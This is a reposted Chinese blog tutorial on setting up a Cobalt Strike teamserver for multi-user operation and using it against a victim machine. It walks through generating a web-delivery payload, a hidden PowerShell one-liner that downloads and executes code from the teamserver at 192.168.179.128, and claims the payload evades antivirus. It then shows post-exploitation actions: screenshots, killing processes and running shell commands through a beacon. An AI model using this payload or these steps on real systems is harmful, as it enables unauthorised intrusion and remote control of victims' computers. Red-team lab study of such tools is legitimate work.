0


CobaltStrike搭建--多人协作

CS安装与配置

在团队(服务端)启动服务遇到两个报错

在这里插入图片描述

配置java环境

https://www.oracle.com/java/technologies/downloads/#java18

rpm -ivh jdk–xx(直接Tab即可)

在这里插入图片描述

find / -name keytool
/etc/alternatives/keytool
/usr/lib/jvm/java-11-openjdk-11.0.13.0.8-1.el7_9.x86_64/bin/keytool
/usr/java/jdk-18.0.1.1/bin/keytool
/usr/bin/keytool

在java环境变量最后加
exportPATH=/usr/java/jdk-18.0.1.1/bin/:$PATH

服务器端关闭防火墙

开启服务端

teamserver

在这里插入图片描述

./teamserver 服务端ip 密码

配置客户端

在这里插入图片描述

host: teamserver 的 ip

password: teamserver 设置的密码

点连接即可

在这里插入图片描述

CS上线

  1. 点击耳机图标配置监听image-20211128143814833设置相关属性image-20211128144431243
  2. 生成攻击载荷(Payload)攻击->钓鱼攻击->web脚本传递image-20211128143540347设置参数,也可以设置payload类型在teamserver的80端口生成payload,victim使用powershell加载到内存执行,最终上线image-20211128143519841点击开始生成代码image-20211128143559039powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.179.128:80/a'))"
  3. 目标机器(Victim)运行,上线csimage-20211128150236685在 CS->视图->web日志 中可以看到payload的访问日志payload还具有免杀效果image-20211128144302453

在可视化中可以切换视图

image-20211128144739543

CS攻击

一、屏幕截图

功能中文如图所示

在这里插入图片描述

在这里插入图片描述

INteract即为进入到beacon的交互界面

可以在视图屏幕截图处看到截图

在这里插入图片描述

因为默认会话60秒返回一次,所以再执行操作60秒之后会得到截图,也可以右击会话->选择sleep设置会话时间间隔

在这里插入图片描述

二、进程管理

在这里插入图片描述

在这里插入图片描述

可以直接选定kill进程 或者选择指定进程进行截屏

在这里插入图片描述

进行的任务可以在beacon中使用

jobs

命令查看

image-20211129163315715

使用

jobkill 1

将其kill

命令执行

shell 后拼接命令

在这里插入图片描述

标签: web安全 安全 网络

本文转载自: https://blog.csdn.net/qq_53758490/article/details/125661113
版权归原作者 Tana:: 所有, 如有侵权,请联系我们删除。

“CobaltStrike搭建--多人协作”的评论:

还没有评论